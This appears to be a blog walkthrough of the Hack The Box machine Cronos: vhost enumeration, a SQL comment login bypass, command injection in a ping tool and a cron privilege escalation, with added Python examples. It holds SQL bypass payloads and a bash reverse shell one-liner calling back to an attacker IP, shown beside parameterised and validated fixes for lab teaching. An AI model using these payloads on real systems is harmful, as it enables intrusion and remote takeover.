Introduction

Today I explore Cronos from HTB, an OSCP-like box featuring vhost enumeration, an SQL login bypass and command injection. Once on the box, a writable Laravel script gives us privilege escalation. I started by visiting the IP directly in a web browser, since the majority of HTB boxes have their entry point via a web service. The page that came up was the default Apache landing page, so I immediately ran a vhost scan:

Found admin.cronos.htb with a VHOST search.
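The vhost scan works by sending candidate names in the Host header and looking for responses that differ from the catch-all default site. This is an added example, not the tooling used in the post: the target IP, the domain, the candidate names and the canned responses used for the offline demo are all constructed or assumed.

```python
"""Virtual-host discovery by Host header, the step that surfaced admin.cronos.htb.

Added example, not the tooling from the original post. The target IP,
domain and candidate names are assumptions; the canned responses used for
the offline demo are constructed.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# A fetcher returns (status, body_length) for GET / at `ip` with Host: `host`.
Fetcher = Callable[[str, str], Tuple[int, int]]


def http_fetch(ip: str, host: str, timeout: float = 5.0) -> Tuple[int, int]:
    """Real fetcher: the candidate name goes in the Host header, not the URL."""
    req = urllib.request.Request(f"http://{ip}/", headers={"Host": host})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a body worth measuring
        return err.code, len(err.read())


def find_vhosts(ip: str, domain: str, names: List[str],
                fetch: Fetcher = http_fetch) -> List[str]:
    """Return FQDNs whose response differs from the catch-all (default) vhost.

    Apache answers unknown Host values with its default site, so a name that
    produces a different status or body length is backed by its own vhost.
    """
    baseline = fetch(ip, f"baseline-does-not-exist.{domain}")
    return [f"{name}.{domain}" for name in names
            if fetch(ip, f"{name}.{domain}") != baseline]


# Constructed responses standing in for the target: the Apache default page
# for unknown hosts, and distinct pages for www and admin.
FAKE_RESPONSES: Dict[str, Tuple[int, int]] = {
    "www.cronos.htb": (200, 2319),
    "admin.cronos.htb": (200, 1547),
}


def fake_fetch(ip: str, host: str) -> Tuple[int, int]:
    """Offline stand-in for http_fetch using the constructed table above."""
    return FAKE_RESPONSES.get(host, (200, 11321))


if __name__ == "__main__":
    # Against a live target use fetch=http_fetch and a real wordlist, then add
    # each hit to /etc/hosts, e.g. "10.10.10.13 cronos.htb admin.cronos.htb".
    print(find_vhosts("10.10.10.13", "cronos.htb",
                      ["www", "admin", "dev", "mail"], fetch=fake_fetch))
```

Comparing exact body length is the simplest filter; if the default page reflects the Host header, allow a small length tolerance or compare a hash of the body with the hostname stripped out, otherwise every candidate looks different.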

I add the name to my hosts file and browse to the admin vhost, which presents a login screen. While a gobuster scan runs to look for additional pages and files, I try a few SQL login bypass payloads against the form. One of them works and I get into the panel.

Login page presented.

Bypass the login page with a comment.
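The comment bypass works because the login query is built by string concatenation: `admin' -- ` closes the quoted username and comments out the password check. Below is an added example showing that query next to a parameterised one; it is not the site's own code. The schema, the account and the password are constructed, and SQLite stands in for the MySQL backend (in MySQL the `--` comment must be followed by a space, which the payload already has).

```python
"""Why a comment sequence bypasses the admin login: the query is built by
string concatenation, so `admin' -- ` closes the quoted username and
comments out the password check.

Added example, not the site's code. The schema, the account and the password
are constructed; SQLite stands in for the MySQL backend.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account (plaintext password
    only to keep the demo short; real code stores a password hash)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-demo-secret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str,
                     password: str) -> Optional[str]:
    """Mirrors the classic PHP pattern: user input spliced straight into SQL."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str,
               password: str) -> Optional[str]:
    """Same check with bound parameters: input can never change the query shape."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads of the kind tried against the panel: close the string, comment out the rest.
COMMENT_BYPASS = "admin' -- "      # targets a known username
TAUTOLOGY_BYPASS = "' OR 1=1 -- "  # no username needed, first row wins


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, COMMENT_BYPASS, "anything"))    # admin
    print(login_vulnerable(db, TAUTOLOGY_BYPASS, "anything"))  # admin
    print(login_safe(db, COMMENT_BYPASS, "anything"))          # None
```

The resulting vulnerable query is `SELECT username FROM users WHERE username = 'admin' -- ' AND password = 'anything'`; everything after `--` is ignored, so any password is accepted. With bound parameters the same input is compared literally against the username column and matches nothing.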

Also found through gobuster: you can run commands on Welcome without needing to be logged in.

The panel has a Net Tool page that runs network diagnostic commands (ping and traceroute) against a host you supply. I catch the request in Burp and try a few commands to see whether I have command execution:

Direct command injection to the host?

Finding out where/who I am and which python/nc binaries are available.

Having confirmed command execution, I use a reverse shell one-liner to get a shell on the machine. PayloadsAllTheThings has a great resource for this.
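The Net Tool injection and the reverse shell that follows from it, as an added example rather than the box's PHP: the form's command and host values are joined into one string and handed to a shell, so a `;` in the host field appends whatever the attacker likes. The hardened version validates the host and passes argv without a shell. The listener address is an assumption, and `echo probing` stands in for `ping -c 1` so the demo runs without a network.

```python
"""The Net Tool joins a command name and a user-supplied host into one shell
string; a `;` in the host field appends an attacker command. Below, the
vulnerable pattern next to a hardened one.

Added example, not the box's PHP. The listener address is an assumption and
`echo probing` stands in for `ping -c 1` so the demo runs without a network.
"""
import ipaddress
import re
import subprocess
from typing import Dict, List

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Allowlist of tools the safe handler may run, keyed by the form's command name.
ALLOWED_COMMANDS: Dict[str, List[str]] = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute"],
}


def is_valid_host(host: str) -> bool:
    """Accept an IP literal or a plain hostname; anything else (spaces, `;`,
    quotes, redirections) is rejected before it gets near a process."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.match(host) is not None


def net_tool_vulnerable(command: str, host: str) -> str:
    """Equivalent of shell_exec($command . " " . $host): one string, one shell."""
    completed = subprocess.run(command + " " + host, shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def net_tool_safe(name: str, host: str,
                  commands: Dict[str, List[str]] = ALLOWED_COMMANDS) -> str:
    """Look the tool up in an allowlist, validate the host, then pass argv
    with shell=False so metacharacters in the host are inert."""
    if name not in commands:
        raise ValueError("unknown tool: " + repr(name))
    if not is_valid_host(host):
        raise ValueError("invalid host: " + repr(host))
    completed = subprocess.run(commands[name] + [host], shell=False,
                               capture_output=True, text=True)
    return completed.stdout


def reverse_shell_payload(lhost: str, lport: int) -> str:
    """Host-field value that chains a bash reverse shell after a real target,
    in the one-liner form PayloadsAllTheThings lists. Not executed here."""
    return f"8.8.8.8; bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


if __name__ == "__main__":
    # The injected command runs: output contains the second echo.
    print(net_tool_vulnerable("echo probing", "8.8.8.8; echo INJECTED"))
    # The hardened handler runs the stand-in tool with the host as one argv entry.
    print(net_tool_safe("probe", "8.8.8.8", commands={"probe": ["echo", "probing"]}))
    # The reverse shell payload never passes validation.
    print(is_valid_host(reverse_shell_payload("10.10.14.5", 4444)))  # False
```

With a listener running (`nc -lvnp 4444` on the assumed 10.10.14.5), the string from `reverse_shell_payload` is what goes into the host parameter of the captured request; the box's own traceroute or ping runs first and the chained bash connects back.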

On the box I run LinPEAS, which shows me a possible escalation point:

LinPEAS showing artisan being a pivot point.

I navigate to the artisan file it mentioned and review the script. The file is writable by our user yet is run by root from cron, so whatever we put in it executes as root on the next run. I add my PHP reverse shell one-liner (also from the resource noted above) and save the file. I start a local nc listener and wait. The shell spawns a moment later and I grab root.

Altering artisan file to catch the shell.

Rooted cronos with proof.

Rooted

Published On: October 17th, 2020 / Categories: HTB, Technology